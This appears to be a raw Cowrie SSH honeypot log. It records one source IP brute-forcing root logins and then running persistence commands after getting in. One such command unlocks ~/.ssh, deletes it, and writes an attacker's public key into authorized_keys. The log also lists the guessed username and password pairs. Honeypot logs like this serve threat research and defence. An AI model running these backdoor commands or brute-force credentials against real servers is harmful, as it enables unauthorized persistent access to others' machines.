{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:02:23.691612Z","src_ip":"212.227.235.229","session":"2ea55a997c64"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T23:02:24.073922Z","src_ip":"212.227.235.229","session":"2ea55a997c64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32580,"dst_ip":"1.2.3.4","dst_port":22,"session":"e494e214ea40","protocol":"ssh","message":"New connection: 212.227.235.229:32580 (1.2.3.4:22) [session: e494e214ea40]","sensor":"my-vps","timestamp":"2025-09-08T23:02:24.486423Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:02:24.795140Z","src_ip":"212.227.235.229","session":"e494e214ea40"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:02:25.170734Z","src_ip":"212.227.235.229","session":"2ea55a997c64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40884,"dst_ip":"1.2.3.4","dst_port":22,"session":"1934bd96b112","protocol":"ssh","message":"New connection: 212.227.235.229:40884 (1.2.3.4:22) [session: 1934bd96b112]","sensor":"my-vps","timestamp":"2025-09-08T23:02:26.760702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:02:26.771945Z","src_ip":"212.227.235.229","session":"1934bd96b112"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:02:27.023783Z","src_ip":"212.227.235.229","session":"1934bd96b112"}
{"eventid":"cowrie.login.failed","username":"server","password":"Password1","message":"login attempt [server/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T23:02:28.056451Z","src_ip":"212.227.235.229","session":"1934bd96b112"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53538,"dst_ip":"1.2.3.4","dst_port":22,"session":"121460cf3bb9","protocol":"ssh","message":"New connection: 212.227.235.229:53538 (1.2.3.4:22) [session: 121460cf3bb9]","sensor":"my-vps","timestamp":"2025-09-08T23:02:29.159595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:02:29.160421Z","src_ip":"212.227.235.229","session":"121460cf3bb9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:02:29.278199Z","src_ip":"212.227.235.229","session":"1934bd96b112"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:02:35.160470Z","src_ip":"212.227.235.229","session":"121460cf3bb9"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:02:35.162274Z","src_ip":"212.227.235.229","session":"121460cf3bb9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57200,"dst_ip":"1.2.3.4","dst_port":22,"session":"95e47939bfd3","protocol":"ssh","message":"New connection: 212.227.235.229:57200 (1.2.3.4:22) [session: 95e47939bfd3]","sensor":"my-vps","timestamp":"2025-09-08T23:02:40.611251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:02:40.611900Z","src_ip":"212.227.235.229","session":"95e47939bfd3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:02:40.947212Z","src_ip":"212.227.235.229","session":"95e47939bfd3"}
{"eventid":"cowrie.login.failed","username":"gaoyuan","password":"111","message":"login attempt [gaoyuan/111] failed","sensor":"my-vps","timestamp":"2025-09-08T23:02:42.331141Z","src_ip":"212.227.235.229","session":"95e47939bfd3"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:02:43.668969Z","src_ip":"212.227.235.229","session":"95e47939bfd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59100,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec0cfb51613a","protocol":"ssh","message":"New connection: 212.227.235.229:59100 (1.2.3.4:22) [session: ec0cfb51613a]","sensor":"my-vps","timestamp":"2025-09-08T23:02:52.425568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:02:52.426482Z","src_ip":"212.227.235.229","session":"ec0cfb51613a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:02:52.688906Z","src_ip":"212.227.235.229","session":"ec0cfb51613a"}
{"eventid":"cowrie.login.success","username":"root","password":"juke2024","message":"login attempt [root/juke2024] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:02:53.773800Z","src_ip":"212.227.235.229","session":"ec0cfb51613a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:02:54.347230Z","src_ip":"212.227.235.229","session":"ec0cfb51613a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:02:54.347928Z","src_ip":"212.227.235.229","session":"ec0cfb51613a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:02:54.348952Z","src_ip":"212.227.235.229","session":"ec0cfb51613a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:02:54.611342Z","src_ip":"212.227.235.229","session":"ec0cfb51613a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:02:55.153248Z","src_ip":"212.227.235.229","session":"ec0cfb51613a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:02:55.153944Z","src_ip":"212.227.235.229","session":"ec0cfb51613a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:02:55.416845Z","src_ip":"212.227.235.229","session":"ec0cfb51613a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:02:55.417681Z","src_ip":"212.227.235.229","session":"ec0cfb51613a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59114,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d0a9b5c8614","protocol":"ssh","message":"New connection: 212.227.235.229:59114 (1.2.3.4:22) [session: 0d0a9b5c8614]","sensor":"my-vps","timestamp":"2025-09-08T23:02:55.680262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:02:55.681032Z","src_ip":"212.227.235.229","session":"0d0a9b5c8614"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:02:55.943322Z","src_ip":"212.227.235.229","session":"0d0a9b5c8614"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:02:57.035115Z","src_ip":"212.227.235.229","session":"0d0a9b5c8614"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:02:58.298972Z","src_ip":"212.227.235.229","session":"0d0a9b5c8614"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43070,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b3560ea21f2","protocol":"ssh","message":"New connection: 212.227.235.229:43070 (1.2.3.4:22) [session: 6b3560ea21f2]","sensor":"my-vps","timestamp":"2025-09-08T23:02:58.564580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:02:58.565525Z","src_ip":"212.227.235.229","session":"6b3560ea21f2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:02:58.831539Z","src_ip":"212.227.235.229","session":"6b3560ea21f2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:02:59.939298Z","src_ip":"212.227.235.229","session":"6b3560ea21f2"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:00.205925Z","src_ip":"212.227.235.229","session":"ec0cfb51613a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:00.207499Z","src_ip":"212.227.235.229","session":"6b3560ea21f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45358,"dst_ip":"1.2.3.4","dst_port":22,"session":"e55dfb09b95b","protocol":"ssh","message":"New connection: 212.227.235.229:45358 (1.2.3.4:22) [session: e55dfb09b95b]","sensor":"my-vps","timestamp":"2025-09-08T23:03:00.291248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:00.291908Z","src_ip":"212.227.235.229","session":"e55dfb09b95b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:00.603800Z","src_ip":"212.227.235.229","session":"e55dfb09b95b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54588,"dst_ip":"1.2.3.4","dst_port":22,"session":"76b25e9d84c7","protocol":"ssh","message":"New connection: 212.227.235.229:54588 (1.2.3.4:22) [session: 76b25e9d84c7]","sensor":"my-vps","timestamp":"2025-09-08T23:03:01.793658Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:01.794997Z","src_ip":"212.227.235.229","session":"76b25e9d84c7"}
{"eventid":"cowrie.login.failed","username":"db1inst1","password":"abc123","message":"login attempt [db1inst1/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:03:01.907911Z","src_ip":"212.227.235.229","session":"e55dfb09b95b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:01.928394Z","src_ip":"212.227.235.229","session":"76b25e9d84c7"}
{"eventid":"cowrie.login.success","username":"root","password":"as123456","message":"login attempt [root/as123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:03:02.518826Z","src_ip":"212.227.235.229","session":"76b25e9d84c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:03:02.854792Z","src_ip":"212.227.235.229","session":"76b25e9d84c7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:03:02.855726Z","src_ip":"212.227.235.229","session":"76b25e9d84c7"}
